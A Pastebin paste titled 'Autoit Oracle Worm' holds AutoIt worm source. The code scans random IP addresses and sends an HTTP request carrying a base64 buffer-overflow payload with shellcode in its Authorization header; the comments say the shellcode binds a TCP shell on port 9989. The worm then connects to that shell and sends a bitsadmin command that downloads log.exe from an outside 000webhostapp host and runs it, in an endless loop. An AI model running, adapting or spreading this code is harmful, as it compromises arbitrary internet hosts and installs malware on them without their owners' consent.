Advertisement
KekSec

Autoit Oracle Worm :DDDDD

Nov 10th, 2017
628
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.35 KB | None | 0 0
  1. ;shellcode runs bind tcp shell on port 9989
  2. ;scanner exploits oracle port 80 (via 0day bof)
  3. ;scanner connects and sends download and execute command.
  4. Func ExploitRandomPC()
  5. TCPStartup()
  6. HotKeySet("{Esc}", "_Close")
  7. $ip = Random(1,255)&"."&Random(1,255)&"."&Random(1,255)&"."&Random(1,255)
  8. $socket = TCPConnect($ip, 80)
  9. If @error Then
  10. TCPShutdown()
  11. EndIf
  12. $data = "GET / HTTP/1.1\r\nHost: "&$ip&"\r\nAuthorization: Basic QUFBQTpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC62SQkEZtYWCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkOsQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkIHE/+///0S6ZNuT59rW2XQk9FgpybFTMVASg8AEAzTVcRJIAffdsNKYVFXjmAMeVClHclnCBWbqpoGJWwz0pFw9xKfePBkH3o5sRifynRrweDOKdTSIIcXYiNae27lJlIUZaHm+E3Ke++oJVHft26R4QiIJi5pjrnTpncwJ6lqu1X94CJ3YpKhyvi+mP7R3q74ZDNdLnMJRD7vGOsuiX+e6279IYn60ZXfzl+G0Pify0klUwH3i8mj1LAWOLIiZcc/psLWbuaocpFEqoHHPIgcq8s/3mrJ/kPA8oID6lskpBxnSrI7/dr/GqO59PWGJfhfZPTZx3kLHV0jUTLRMxVKR5JLFb2XRdG+sgRXiK1FTH+QGNNH9wqhIVPAwDJ+w7u0eOWJJBSm6UgEdEgXfy9T/kaWOrHshVp+7N1fKTdfmowvoxyOckTXUY0j+9IFYC50fCbbAn+T1/CMMhvo8ZYNH+5b52G6Yrtm6kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJA=\r\n\r\n"
  13. TCPSend($socket, $data)
  14. TCPShutdown()
  15. TCPStartup()
  16. $socket = TCPConnect($ip, 9989)
  17. TCPSend($socket, "bitsadmin /transfer myjob /download /priority high http://rangier-match.000webhostapp.com/log.exe %TEMP%\log.exe&start %TEMP%\log.exe\r\n")
  18. TCPShutdown()
  19. EndFunc
  20.  
  21. While 1 = 1
  22. ExploitRandomPC()
  23. WEnd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement